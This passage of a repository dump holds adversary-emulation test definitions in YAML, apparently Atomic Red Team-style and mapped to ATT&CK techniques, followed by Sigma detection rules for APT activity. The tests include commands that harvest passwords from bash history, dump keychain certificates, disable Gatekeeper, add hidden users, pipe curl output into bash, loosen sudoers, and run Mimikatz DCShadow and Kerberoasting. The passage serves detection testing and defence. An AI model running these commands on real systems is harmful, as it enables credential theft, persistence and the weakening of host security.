8 | Search through bash history for specific commands we want to capture; the matches are written to #{output_file} (default ~/loot.txt) and nothing removes that file afterwards.
9 | supported_platforms:
10 | - linux
11 | - macos
12 | input_arguments:
13 | bash_history_filename:
14 | description: Path of the bash history file to capture
15 | type: Path
16 | default: ~/.bash_history
17 | bash_history_grep_args:
18 | description: grep arguments that filter out specific commands we want to capture
19 | type: Path
20 | default: -e '-p ' -e 'pass' -e 'ssh'
21 | output_file:
22 | description: Path where captured results will be placed
23 | type: Path
24 | default: ~/loot.txt
25 | executor:
26 | name: sh
27 | command: |
28 | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1142.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1142
3 | display_name: Keychain
4 |
5 | atomic_tests:
6 | - name: Keychain
7 | description: |
8 | ### Keychain Files
9 |
10 | ~/Library/Keychains/
11 |
12 | /Library/Keychains/
13 |
14 | /Network/Library/Keychains/
15 |
16 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
17 |
18 | [Keychain dumper](https://github.com/juuso/keychaindump) — note: the executor exports all certificates to allcerts.pem in the current directory, then runs `security import /tmp/certs.pem -k`, which expects a keychain argument after `-k` and a file this test never creates; supply both before relying on the import step.
19 |
20 |
21 | supported_platforms:
22 | - macos
23 |
24 | executor:
25 | name: sh
26 | command: |
27 | security -h
28 | security find-certificate -a -p > allcerts.pem
29 | security import /tmp/certs.pem -k
30 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1143.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1143
3 | display_name: Hidden Window
4 |
5 | atomic_tests:
6 | - name: Hidden Window
7 | description: |
8 | Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | powershell_command:
15 | description: Command to launch calc.exe from a hidden PowerShell Window
16 | type: String
17 | default: powershell.exe -WindowStyle hidden calc.exe
18 | powershell_process_name:
19 | description: Name of the created process
20 | type: string
21 | default: calculator
22 |
23 | executor:
24 | name: powershell
25 | elevation_required: false
26 | command: |
27 | Start-Process #{powershell_command}
28 | cleanup_command: |
29 | Stop-Process -Name "#{powershell_process_name}"
--------------------------------------------------------------------------------
/elemental/media/atomics/T1144.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1144
3 | display_name: Gatekeeper Bypass
4 |
5 | atomic_tests:
6 | - name: Gatekeeper Bypass
7 | description: |
8 | Gatekeeper Bypass via command line: strips the quarantine attribute from #{app_path} and then disables Gatekeeper system-wide (spctl --master-disable). Both steps need sudo and there is no cleanup_command, so Gatekeeper stays disabled on the host until re-enabled (sudo spctl --master-enable).
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | app_path:
15 | description: Path to app to be used
16 | type: Path
17 | default: myapp.app
18 |
19 | executor:
20 | name: sh
21 | command: |
22 | sudo xattr -r -d com.apple.quarantine #{app_path}
23 | sudo spctl --master-disable
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1147.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1147
3 | display_name: Hidden Users
4 |
5 | atomic_tests:
6 | - name: Hidden Users
7 | description: |
8 | Add a hidden user on macOS by creating a local account with UniqueID 333 (accounts with a UniqueID below 500 are normally hidden from the login window). There is no cleanup_command, so the account (#{user_name}, default APT) persists until deleted manually.
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | user_name:
15 | description: username to add
16 | type: string
17 | default: APT
18 |
19 | executor:
20 | name: sh
21 | command: |
22 | sudo dscl . -create /Users/#{user_name} UniqueID 333
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1148.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1148
3 | display_name: HISTCONTROL
4 |
5 | atomic_tests:
6 | - name: Disable history collection
7 | description: |
8 | Disables history collection in shells
9 | supported_platforms:
10 | - linux
11 | - macos
12 | input_arguments:
13 | evil_command:
14 | description: Value appended to the ls command after history collection is disabled (as written it is passed as an argument to ls, not executed as a command)
15 | type: String
16 | default: whoami
17 | executor:
18 | name: sh
19 | command: |
20 | export HISTCONTROL=ignoreboth
21 | ls #{evil_command}
22 |
23 | - name: Mac HISTCONTROL
24 | description: |
25 |
26 | supported_platforms:
27 | - macos
28 | - linux
29 |
30 | executor:
31 | name: manual
32 | steps: |
33 | 1. export HISTCONTROL=ignoreboth
34 | 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
35 | 3. ls
36 | 4. whoami > recon.txt
37 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1150.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1150
3 | display_name: Plist Modification
4 |
5 | atomic_tests:
6 | - name: Plist Modification
7 | description: |
8 | Modify MacOS plist file in one of two directories
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: manual
15 | steps: |
16 | 1. Modify a .plist in
17 |
18 | /Library/Preferences
19 |
20 | OR
21 |
22 | ~/Library/Preferences
23 |
24 | 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1151.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1151
3 | display_name: Space After Filename
4 |
5 | atomic_tests:
6 | - name: Space After Filename
7 | description: |
8 | Space After Filename
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: manual
15 | steps: |
16 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
17 |
18 | 2. mv execute.txt "execute.txt "
19 |
20 | 3. ./execute.txt\
21 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1152.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1152
3 | display_name: Launchctl
4 |
5 | atomic_tests:
6 | - name: Launchctl
7 | description: |
8 | Utilize launchctl to submit a job (label "evil") that launches Calculator. There is no cleanup_command; remove the job with `launchctl remove evil` when finished.
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: sh
15 | command: |
16 | launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
17 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1153.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1153
3 | display_name: Source
4 |
5 | atomic_tests:
6 | - name: Execute Script using Source
7 | description: |
8 | Creates a script and executes it using the source command
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
18 | chmod +x /tmp/art.sh
19 | source /tmp/art.sh
20 |
21 | - name: Execute Script using Source Alias
22 | description: |
23 | Creates a script and executes it using the source command's dot alias
24 |
25 | supported_platforms:
26 | - macos
27 | - linux
28 |
29 | executor:
30 | name: sh
31 | command: |
32 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
33 | chmod +x /tmp/art.sh
34 | . /tmp/art.sh
35 |
36 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1154.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1154
3 | display_name: Trap
4 |
5 | atomic_tests:
6 | - name: Trap
7 | description: |
8 | After exiting the shell, the script will download and execute.
9 |
10 | After sending a keyboard interrupt (CTRL+C) the script will download and execute.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor: # NOTE(review): the command below pipes a script fetched from the upstream repo's master branch into bash; pin the URL to a commit and review the fetched file so the executed content cannot change underneath this definition
19 | name: sh
20 | command: | # NOTE(review): 'exit' on the second line ends the shell before the INT trap on the third line is installed, so the CTRL+C case described above presumably never runs — confirm and reorder if the INT path is intended
21 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
22 | exit
23 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1156.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1156
3 | display_name: .bash_profile and .bashrc
4 |
5 | atomic_tests:
6 | - name: Add command to .bash_profile
7 | description: |
8 | Adds a command to the .bash_profile file of the current user
9 | supported_platforms:
10 | - macos
11 | - linux
12 | input_arguments:
13 | command_to_add:
14 | description: Command to add to the .bash_profile file
15 | type: string
16 | default: /path/to/script.py
17 | executor:
18 | name: sh
19 | command: |
20 | echo "#{command_to_add}" >> ~/.bash_profile
21 |
22 | - name: Add command to .bashrc
23 | description: |
24 | Adds a command to the .bashrc file of the current user
25 | supported_platforms:
26 | - macos
27 | - linux
28 | input_arguments:
29 | command_to_add:
30 | description: Command to add to the .bashrc file
31 | type: string
32 | default: /path/to/script.py
33 | executor:
34 | name: sh
35 | command: |
36 | echo "#{command_to_add}" >> ~/.bashrc
37 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1160.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1160
3 | display_name: Launch Daemon
4 |
5 | atomic_tests:
6 | - name: Launch Daemon
7 | description: |
8 | Utilize LaunchDaemon to launch `Hello World`
9 |
10 | supported_platforms:
11 | - macos
12 |
13 |
14 | executor:
15 | name: manual
16 | steps: |
17 | 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
18 | 2.
19 |
20 |
21 |
22 |
23 | Label
24 | com.example.hello
25 | ProgramArguments
26 |
27 | hello
28 | world
29 |
30 | KeepAlive
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1163.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1163
3 | display_name: rc.common
4 |
5 | atomic_tests:
6 | - name: rc.common
7 | description: |
8 | Modify rc.common
9 |
10 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor:
16 | name: sh
17 | command: |
18 | echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
19 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1169.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1169
3 | display_name: SUDO
4 |
5 | atomic_tests:
6 | - name: Sudo usage
7 | description: |
8 | Common Sudo enumeration methods.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sudo -l
18 | sudo su
19 | cat /etc/sudoers
20 | vim /etc/sudoers
21 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1179.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1179
3 | display_name: Hooking
4 |
5 | atomic_tests:
6 | - name: Hook PowerShell TLS Encrypt/Decrypt Messages
7 | description: |
8 | Hooks functions in PowerShell to read TLS Communications
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | file_name:
13 | description: Dll To Inject
14 | type: Path
15 | default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll
16 | server_name:
17 | description: TLS Server To Test Get Request
18 | type: Url
19 | default: https://www.example.com
20 | executor:
21 | name: powershell
22 | elevation_required: true
23 | command: |
24 | mavinject $pid /INJECTRUNNING #{file_name}
25 | curl #{server_name}
26 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1196.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1196
3 | display_name: Control Panel Items
4 |
5 | atomic_tests:
6 | - name: Control Panel Items
7 | description: |
8 | This test simulates an adversary leveraging control.exe to execute a payload and pops calc
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | cpl_file_path:
15 | description: path to cpl file
16 | type: path
17 | default: calc.cpl
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | control.exe #{cpl_file_path}
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1206.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1206
3 | display_name: Sudo Caching
4 |
5 | atomic_tests:
6 | - name: Unlimited sudo cache timeout
7 | description: |
8 | Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
18 | sudo visudo -c -f /etc/sudoers
19 |
20 | - name: Disable tty_tickets for sudo caching
21 | description: |
22 | Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
23 |
24 | supported_platforms:
25 | - macos
26 | - linux
27 |
28 | executor:
29 | name: sh
30 | command: |
31 | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
32 | sudo visudo -c -f /etc/sudoers
33 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1207.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1207
3 | display_name: DCShadow
4 |
5 | atomic_tests:
6 | - name: DCShadow - Mimikatz
7 | description: |
8 | Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
9 |
10 | [DCShadow](https://www.dcshadow.com/)
11 | [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor:
17 | name: manual
18 | steps: |
19 | 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
20 | 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
21 | 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
22 | 4. lsadump::dcshadow /push
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1208.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1208
3 | display_name: Kerberoasting
4 |
5 | atomic_tests:
6 | - name: Request for service tickets
7 | description: |
8 | This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
9 |
10 | The following are further sources and credits for this attack:
11 | [Kerberoasting Without Mimikatz source](https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
12 | [Invoke-Kerberoast source](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
13 |
14 | supported_platforms:
15 | - windows
16 |
17 | executor:
18 | name: powershell
19 | elevation_required: false
20 | command: |
21 | Import-Module .\Invoke-Kerberoast.ps1
22 | Invoke-Kerberoast | fl
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1214.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1214
3 | display_name: Credentials in Registry
4 |
5 | atomic_tests:
6 | - name: Enumeration for Credentials in Registry
7 | description: |
8 | Queries to enumerate for credentials in the Registry.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: command_prompt
15 | elevation_required: false
16 | command: |
17 | reg query HKLM /f password /t REG_SZ /s
18 | reg query HKCU /f password /t REG_SZ /s
19 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1496.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1496
3 | display_name: Resource Hijacking
4 |
5 | atomic_tests:
6 | - name: macOS/Linux - Simulate CPU Load with Yes
7 | description: |
8 | This test simulates a high CPU load as you might observe during cryptojacking attacks.
9 | End the test by using CTRL/CMD+C to break.
10 |
11 | supported_platforms:
12 | - macos
13 | - centos
14 | - ubuntu
15 | - linux
16 |
17 | executor:
18 | name: bash
19 | command: |
20 | yes > /dev/null
21 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1500.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1500
3 | display_name: Compile After Delivery
4 |
5 | atomic_tests:
6 | - name: Compile After Delivery using csc.exe
7 | description: |
8 | Compile C# code using csc.exe binary used by .NET
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_file:
15 | description: C# code that launches calc.exe from a hidden cmd.exe Window
16 | type: file
17 | default: $PathToAtomicsFolder\T1500\src\calc.cs
18 | output_file:
19 | description: Output compiled binary
20 | type: file
21 | default: C:\Windows\Temp\T1500.exe
22 |
23 | executor:
24 | name: command_prompt
25 | elevation_required: false
26 | command: |
27 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
28 | cleanup_command: |
29 | del #{output_file}
--------------------------------------------------------------------------------
/elemental/media/atomics/T1518.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1518
3 | display_name: Software Discovery
4 |
5 | atomic_tests:
6 | - name: Find and Display Internet Explorer Browser Version
7 | description: |
8 | Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: command_prompt
15 | elevation_required: false # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
16 | command: | # these are the actual attack commands, at least one command must be provided
17 | reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
18 |
19 |
--------------------------------------------------------------------------------
/elemental/media/elemental.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/media/elemental.png
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_apt29_thinktanks.yml:
--------------------------------------------------------------------------------
1 | title: APT29
2 | id: 033fe7d6-66d1-4240-ac6b-28908009c71f
3 | description: This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks
4 | references:
5 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
6 | tags:
7 | - attack.execution
8 | - attack.g0016
9 | - attack.t1086
10 | author: Florian Roth
11 | date: 2018/12/04
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine: '*-noni -ep bypass $*'
18 | condition: selection
19 | falsepositives:
20 | - unknown
21 | level: critical
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_babyshark.yml:
--------------------------------------------------------------------------------
1 | title: Baby Shark Activity
2 | id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35
3 | status: experimental
4 | description: Detects activity that could be related to Baby Shark malware
5 | references:
6 | - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
7 | tags:
8 | - attack.execution
9 | - attack.t1059
10 | - attack.t1086
11 | - attack.discovery
12 | - attack.t1012
13 | - attack.defense_evasion
14 | - attack.t1170
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | author: Florian Roth
19 | date: 2019/02/24
20 | detection:
21 | selection:
22 | CommandLine:
23 | - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
24 | - powershell.exe mshta.exe http*
25 | - cmd.exe /c taskkill /im cmd.exe
26 | condition: selection
27 | falsepositives:
28 | - unknown
29 | level: high
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_bear_activity_gtr19.yml:
--------------------------------------------------------------------------------
1 | title: Judgement Panda Exfil Activity
2 | id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
3 | description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
4 | references:
5 | - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
6 | author: Florian Roth
7 | date: 2019/02/21
8 | tags:
9 | - attack.credential_access
10 | - attack.t1081
11 | - attack.t1003
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | Image: '*\xcopy.exe'
18 | CommandLine: '* /S /E /C /Q /H \\*'
19 | selection2:
20 | Image: '*\adexplorer.exe'
21 | CommandLine: '* -snapshot "" c:\users\\*'
22 | condition: selection1 or selection2
23 | falsepositives:
24 | - unknown
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_carbonpaper_turla.yml:
--------------------------------------------------------------------------------
1 | title: Turla Service Install
2 | id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
3 | description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
4 | references:
5 | - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
6 | tags:
7 | - attack.persistence
8 | - attack.g0010
9 | - attack.t1050
10 | logsource:
11 | product: windows
12 | service: system
13 | detection:
14 | selection:
15 | EventID: 7045
16 | ServiceName:
17 | - 'srservice'
18 | - 'ipvpn'
19 | - 'hkmsvc'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_cloudhopper.yml:
--------------------------------------------------------------------------------
1 | title: WMIExec VBS Script
2 | id: 966e4016-627f-44f7-8341-f394905c361f
3 | description: Detects suspicious file execution by wscript and cscript
4 | author: Florian Roth
5 | references:
6 | - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
7 | tags:
8 | - attack.execution
9 | - attack.g0045
10 | - attack.t1064
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | Image: '*\cscript.exe'
17 | CommandLine: '*.vbs /shell *'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - Unlikely
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_empiremonkey.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Empire Monkey
3 | id: 10152a7b-b566-438f-a33c-390b607d1c8d
4 | description: Detects EmpireMonkey APT reported Activity
5 | references:
6 | - https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b
7 | tags:
8 | - attack.t1086
9 | - attack.execution
10 | date: 2019/04/02
11 | author: Markus Neis
12 | detection:
13 | condition: 1 of them
14 | falsepositives:
15 | - Very Unlikely
16 | level: critical
17 | ---
18 | logsource:
19 | category: process_creation
20 | product: windows
21 | detection:
22 | selection_cutil:
23 | CommandLine:
24 | - '*/i:%APPDATA%\logs.txt scrobj.dll'
25 | Image:
26 | - '*\cutil.exe'
27 | selection_regsvr32:
28 | CommandLine:
29 | - '*/i:%APPDATA%\logs.txt scrobj.dll'
30 | Description:
31 | - Microsoft(C) Registerserver
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_equationgroup_dll_u_load.yml:
--------------------------------------------------------------------------------
1 | title: Equation Group DLL_U Load
2 | id: d465d1d8-27a2-4cca-9621-a800f37cf72e
3 | author: Florian Roth
4 | description: Detects a specific tool and export used by EquationGroup
5 | references:
6 | - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
7 | - https://securelist.com/apt-slingshot/84312/
8 | - https://twitter.com/cyb3rops/status/972186477512839170
9 | tags:
10 | - attack.execution
11 | - attack.g0020
12 | - attack.t1059
13 | - attack.defense_evasion
14 | - attack.t1085
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection1:
20 | Image: '*\rundll32.exe'
21 | CommandLine: '*,dll_u'
22 | selection2:
23 | CommandLine: '* -export dll_u *'
24 | condition: 1 of them
25 | falsepositives:
26 | - Unknown
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_hurricane_panda.yml:
--------------------------------------------------------------------------------
1 | title: Hurricane Panda Activity
2 | id: 0eb2107b-a596-422e-b123-b389d5594ed7
3 | author: Florian Roth
4 | status: experimental
5 | description: Detects Hurricane Panda Activity
6 | references:
7 | - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
8 | tags:
9 | - attack.privilege_escalation
10 | - attack.g0009
11 | - attack.t1068
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '* localgroup administrators admin /add'
19 | - '*\Win64.exe*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_slingshot.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Defrag Deactivation
3 | id: 958d81aa-8566-4cea-a565-59ccd4df27b0
4 | author: Florian Roth
5 | description: Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group
6 | references:
7 | - https://securelist.com/apt-slingshot/84312/
8 | tags:
9 | - attack.persistence
10 | - attack.t1053
11 | - attack.s0111
12 | detection:
13 | condition: 1 of them
14 | falsepositives:
15 | - Unknown
16 | level: medium
17 | ---
18 | logsource:
19 | category: process_creation
20 | product: windows
21 | detection:
22 | selection1:
23 | CommandLine:
24 | - '*schtasks* /delete *Defrag\ScheduledDefrag*'
25 | ---
26 | logsource:
27 | product: windows
28 | service: security
29 | definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success'
30 | detection:
31 | selection2:
32 | EventID: 4701
33 | TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag'
34 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_sofacy.yml:
--------------------------------------------------------------------------------
1 | title: Sofacy Trojan Loader Activity
2 | id: ba778144-5e3d-40cf-8af9-e28fb1df1e20
3 | author: Florian Roth
4 | status: experimental
5 | description: Detects Trojan loader activity as used by APT28
6 | references:
7 | - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/
8 | - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100
9 | - https://twitter.com/ClearskySec/status/960924755355369472
10 | tags:
11 | - attack.g0007
12 | - attack.execution
13 | - attack.t1059
14 | - attack.defense_evasion
15 | - attack.t1085
16 | - car.2013-10-002
17 | logsource:
18 | category: process_creation
19 | product: windows
20 | detection:
21 | selection:
22 | CommandLine:
23 | - 'rundll32.exe %APPDATA%\\*.dat",*'
24 | - 'rundll32.exe %APPDATA%\\*.dll",#1'
25 | condition: selection
26 | falsepositives:
27 | - Unknown
28 | level: critical
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_stonedrill.yml:
--------------------------------------------------------------------------------
1 | title: StoneDrill Service Install
2 | id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6
3 | description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
4 | author: Florian Roth
5 | references:
6 | - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
7 | tags:
8 | - attack.persistence
9 | - attack.g0064
10 | - attack.t1050
11 | logsource:
12 | product: windows
13 | service: system
14 | detection:
15 | selection:
16 | EventID: 7045
17 | ServiceName: NtsSrv
18 | ServiceFileName: '* LocalService'
19 | condition: selection
20 | falsepositives:
21 | - Unlikely
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_ta17_293a_ps.yml:
--------------------------------------------------------------------------------
1 | title: Ps.exe Renamed SysInternals Tool
2 | id: 18da1007-3f26-470f-875d-f77faf1cab31
3 | description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
4 | references:
5 | - https://www.us-cert.gov/ncas/alerts/TA17-293A
6 | tags:
7 | - attack.defense_evasion
8 | - attack.g0035
9 | - attack.t1036
10 | - car.2013-05-009
11 | author: Florian Roth
12 | date: 2017/10/22
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine: 'ps.exe -accepteula'
19 | condition: selection
20 | falsepositives:
21 | - Renamed SysInternals tool
22 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_tropictrooper.yml:
--------------------------------------------------------------------------------
1 | title: TropicTrooper Campaign November 2018
2 | id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
3 | author: '@41thexplorer, Windows Defender ATP'
4 | status: stable
5 | description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
6 | references:
7 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
8 | tags:
9 | - attack.execution
10 | - attack.t1085
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine: '*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*'
17 | condition: selection
18 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_turla_service_png.yml:
--------------------------------------------------------------------------------
1 | title: Turla PNG Dropper Service
2 | id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
3 | description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
4 | references:
5 | - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
6 | author: Florian Roth
7 | date: 2018/11/23
8 | tags:
9 | - attack.persistence
10 | - attack.g0010
